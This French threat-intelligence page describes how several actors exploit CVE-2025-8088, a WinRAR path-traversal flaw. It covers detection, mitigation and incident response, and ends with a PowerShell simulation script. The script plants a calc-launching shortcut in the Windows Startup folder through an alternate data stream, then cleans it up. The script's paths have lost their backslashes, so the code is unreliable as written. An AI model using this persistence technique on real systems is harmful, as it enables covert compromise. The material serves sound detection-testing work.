SOC Prime Bias: Critique

28 Jan 2026 13:07 UTC

CVE-2025-8088 : Divers Acteurs Malveillants Exploitent une Faille Critique de WinRAR

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
CVE-2025-8088 : Divers Acteurs Malveillants Exploitent une Faille Critique de WinRAR
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le Google Threat Intelligence Group signale une exploitation large du CVE-2025-8088, une vulnérabilité de traversée de chemin de haute gravité dans WinRAR. Les adversaires l’utilisent pour placer des fichiers malveillants dans le dossier de démarrage de Windows afin de persister. Les groupes parrainés par des états aussi bien que ceux motivés financièrement exploitent cette vulnérabilité pour livrer des RATs, des téléchargeurs et des charges utiles de suivi. Le rapport partage des indicateurs ainsi que des conseils pour la détection et l’atténuation.

Enquête

Les chercheurs ont lié plusieurs acteurs—UNC4895, APT44, Turla, et un groupe basé en RPC—à des archives RAR conçues pour abuser des flux de données alternatifs (ADS) pour déposer des fichiers LNK, HTA, ou BAT dans le démarrage. Certaines archives avaient des gestionnaires LNK qui lançaient HTA ou BAT à la connexion. Les familles de malwares observées incluent NESTPACKER, POISONIVY, XWorm, et AsyncRAT. Des infrastructures partagées et des codes d’exploitation réutilisés apparaissent dans des campagnes ciblant l’Ukraine et d’autres régions.

Atténuation

Mettez à jour WinRAR vers la version 7.13+ et appliquez des listes d’applications autorisées. Réduisez l’exposition aux ADS autant que possible et surveillez le dossier de démarrage pour de nouveaux fichiers LNK, HTA, BAT, ou scripts. Appliquez les contrôles de navigation sécurisée de Google et de sécurité des courriels pour bloquer les archives malveillantes plus tôt.

Réponse

Détectez la création de fichiers dans le chemin de démarrage liée à l’extraction RAR, notamment les raccourcis et les scripts. Corrélez les alertes avec des noms de fichiers et des hashes connus, mettez en quarantaine les hôtes affectés, confirmez la famille de malwares, et supprimez la persistance de démarrage lors de la réponse à l’incident.

Flux d’Attaque

Exécution de Simulation

Pré-requis : La vérification préliminaire de télémétrie et de baseline doit avoir été réussie.

Rationnel : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le synopsis DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.

  • Narratif de l’Attaque & Commandes :
    Un attaquant prépare une archive RAR malveillante qui intègre un raccourci Windows (malicious.lnk) comme un Flux de Données Alternatif attaché à un PDF ayant l’apparence d’un leurre (innocuous.pdf). En utilisant le CVE-2025-8088, l’attaquant sait que WinRAR extraira l’ADS directement dans le chemin cible sans assainir le nom du flux. L’archive est livrée à la machine de la victime (par exemple, via phishing). L’attaquant exécute ensuite WinRAR en mode silencieux pour extraire la charge utile directement dans le dossier de démarrage de l’utilisateur actuel, obtenant ainsi la persistance.

    1. Créer la charge utile LNK malveillante (un raccourci qui lance cmd.exe /c calc.exe).
    2. Attachez le LNK en tant que ADS à innocuous.pdf à l’intérieur du RAR.
    3. Livrez le RAR à la victime.
    4. Exécutez l’extraction WinRAR dans le répertoire de Démarrage.
  • Script de Test de Régression :

    # --------------------------------------------------------------
    # Script PowerShell pour simuler la persistance LNK‑ADS du CVE-2025-8088
    # --------------------------------------------------------------
    
    # 1. Variables
    $tempDir      = "$envTEMPLNK_ADS_Test"
    $pdfPath      = "$tempDirinnocuous.pdf"
    $lnkPath      = "$tempDirmalicious.lnk"
    $rarPath      = "$tempDirmalicious.rar"
    $startupPath  = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartup"
    
    # Assurez un espace propre
    Remove-Item -Recurse -Force $tempDir -ErrorAction SilentlyContinue
    New-Item -ItemType Directory -Path $tempDir | Out-Null
    
    # 2. Créez un faux PDF (un fichier vide fonctionne pour la démonstration ADS)
    New-Item -ItemType File -Path $pdfPath | Out-Null
    
    # 3. Créez un LNK malveillant pointant vers la calculatrice
    $ws = New-Object -ComObject WScript.Shell
    $shortcut = $ws.CreateShortcut($lnkPath)
    $shortcut.TargetPath = "calc.exe"
    $shortcut.WindowStyle = 1
    $shortcut.Save()
    
    # 4. Emballez le PDF et attachez le LNK en tant que ADS à l'aide de WinRAR CLI
    #    La syntaxe crée un ADS nommé "malicious.lnk" attaché au PDF.
    & "C:Program FilesWinRARWinRAR.exe" a -df $rarPath $pdfPath "$lnkPath:malicious.lnk"
    
    # 5. Extrayez directement le RAR dans le dossier de démarrage (mode silencieux)
    & "C:Program FilesWinRARWinRAR.exe" x -inul $rarPath $startupPath
    
    # 6. Vérifiez que le LNK existe maintenant dans Démarrage (sera visible comme un .lnk normal)
    $extractedLnk = Join-Path $startupPath "malicious.lnk"
    if (Test-Path $extractedLnk) {
        Write-Host "[+] Raccourci malveillant déployé dans Démarrage : $extractedLnk"
    } else {
        Write-Error "[-] Raccourci non trouvé – l'extraction a peut-être échoué."
    }
    
    # --------------------------------------------------------------
    # Fin du script
    # --------------------------------------------------------------
  • Commandes de Nettoyage :

    # Supprimez le raccourci malveillant de Démarrage
    $lnk = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.lnk"
    if (Test-Path $lnk) { Remove-Item -Force $lnk }
    
    # Supprimez les fichiers et répertoires temporaires
    $temp = "$envTEMPLNK_ADS_Test"
    if (Test-Path $temp) { Remove-Item -Recurse -Force $temp }

Fin du Rapport